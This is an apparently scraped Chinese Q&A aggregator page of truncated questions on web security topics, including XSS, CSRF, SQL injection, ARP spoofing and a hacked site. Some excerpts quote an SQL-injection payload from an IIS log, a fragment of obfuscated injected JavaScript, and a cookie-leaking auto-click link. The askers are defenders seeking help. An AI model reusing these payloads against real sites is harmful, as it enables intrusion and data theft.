草庐IT

javascript - 什么是跨域请求/跨域攻击/跨域协议(protocol)

按照目前的情况,这个问题不适合我们的问答形式。我们希望答案得到事实、引用或专业知识的支持,但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开,visitthehelpcenter指导。关闭9年前。有人能解释一下什么是跨域请求/跨域攻击/跨域协议(protocol)吗?

javascript - 对使用 SQL Server 数据库的 ASP 站点的攻击

我们有一个调查站点显然遭到了攻击。这些症状与本网站下一页所描述的相同:XSSAttackontheASP.NETWebsite.我在我们的IIS日志中发现了多个包含恶意代码的条目:.这是IIS日志条目之一的cs-uri-query字段值的示例。surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2

javascript - 使用 firebase 进行 javascript 注入(inject)攻击的风险

我正在尝试理解/预测与使用firebase作为后端相关的安全注意事项。文档涵盖了验证用户和验证输入,但我找不到任何关于恶意用户试图将javascript注入(inject)数据库的风险的讨论。是否可以将javascript包含在保存到数据库的输入字段中,然后可以在稍后检索该代码并在其他地方显示时执行?或者firebase是否以某种方式转义或清理数据? 最佳答案 任何数据库(或其他存储系统)都可以用来存储恶意代码,因为它们的功能是固有的:它们只是存储数据。FirebaseSDK和支持的库(例如AngularFire、EmberFire

【网络攻击手段之-----ARP欺骗】

网络攻击手段之-----ARP欺骗前言什么是ARP欺骗APR欺骗的原理ARP欺骗的实现ARP欺骗后可以选择进一步攻击ARP欺骗的模拟实验Python语言C语言ARP欺骗的防御前言本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP的欺骗攻击,ARP欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行ARP欺骗攻击。做一个遵纪守法的公民,从我做起!!!什么是ARP欺骗ARP(AddressResolutionProtocol)是一种网络层协议,用于将IP地址转换为物理地址(MAC地址)。在局域网中,每台设备都有唯一的MAC地址,而IP地址是可以重复分配的。因此,当一

javascript - 您如何保护浏览器使用的 RESTful API 免受 CSRF 攻击?

我正在为一组网站设计API。这些站点非常相似(有点像StackOverflow、SuperUser和ServerFault),它们有一个共享的后端是有意义的。因此,我们决定尝试使用一个很好的RESTAPI作为后端,以及一堆使用所述API的非常相似但不同的前端。前端最好是全静态的,但如果事实证明这是不可能的,那也不是硬性要求。我现在正在设计该API,我担心安全隐患,尤其是CSRF。根据我对CSRF攻击的基本理解,它们由两个重要组成部分组成:能够命名资源和请求正文。诱使用户/浏览器使用环境身份验证(如session)向看起来已通过身份验证的资源发出请求。许多修复CSRF攻击的经典方法都是基

javascript - 我如何在 Screeps 中攻击敌人

关闭。这个问题需要detailsorclarity.它目前不接受答案。想改进这个问题吗?通过editingthispost添加细节并澄清问题.关闭8年前。Improvethisquestion播放时screeps我不知道如何攻击敌人。这是我尝试过的。我创建了我的攻击者creep:Game.spawns.Spawn1.createCreep(['attack','move'],'Attacker1');然后当第一个敌人出现在屏幕上时,我尝试运行这个命令但失败了。Game.creeps.Attacker1.attack("Player3");敌人的正确语法是什么?编辑:添加用于访问游戏中对

javascript - 客户网站被攻击了,哎呀!

好吧,我想这一天一定会到来。我客户的网站已被Google入侵并列入黑名单。当您加载主页时,此javascript会自动添加到文档底部:varstr='google-analytics.com';varstr2='6b756c6b61726e696f6f37312e636f6d';str4='php';varstr3='if';str='';for(vari=0;i');我还没有剖析它,但很明显,它是一个试图伪装成谷歌分析的攻击者。我无法解决的问题是,如果我从主页上删除每一个HTML的最后一位,以至于index.html是一个空文档,javascript仍然会被嵌入。是什么赋予了?这怎么

javascript - 转义 < 和 > 是否足以阻止 XSS 攻击?

我确定这个问题的答案是否定的,但我似乎无法找到一种简单地转换的方法。和>至<和>不会完全阻止反射型和持久型XSS。我不是在谈论CSRF。如果这不能阻止XSS,您能否举例说明如何绕过此防御措施? 最佳答案 并非所有XSS攻击都包含,具体取决于插入数据的位置。https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#Why_Can.27t_I_Just_HTML_Entity_Encode_Untrusted_Data.

javascript - 使用 CSP 防止自动点击链接 XSS 攻击

虽然将CSP用于稍微不同的目的(沙盒),但我意识到一个非常简单的自动点击链接似乎可以绕过甚至相对严格的CSP。我所描述的是以下内容:内容安全政策:default-src'none';script-src'unsafe-inline';和body:testdocument.querySelector("a").click();显然,在真正的攻击中,您会将cookie信息包含到href中首先字段,并可能将其包装在隐藏的自嵌入iframe中,或者使域将您重定向回您来自的位置(可能使用其他url参数,从而创建一种绕过connect-src的XMLHttpRequest),但这个基本示例确实显示

javascript - 防止 Javascript 游戏调整/黑客攻击

得益于最近浏览器的增强,使用canvas和javascript开发游戏已成为一个不错的选择,但现在代码很容易访问,只需编写javascript:score=99999或javascript:lives=99会破坏游戏目标。我知道通过一些服务器端检查可以完成一些事情,但我更愿意访问服务器只是为了在最后存储玩家统计数据,或者在大多数情况下甚至只让它成为客户端。我想知道是否至少可以从一些最佳实践开始。(使用不太明显变量名是一个开始,但还不够)-已添加-感谢您的回复,我一直在寻求改进客户端代码,足以阻止“临时黑客”,但仍然尽可能保持代码干净。任何真正想要破解它的人无论如何都会成功,即使有服务器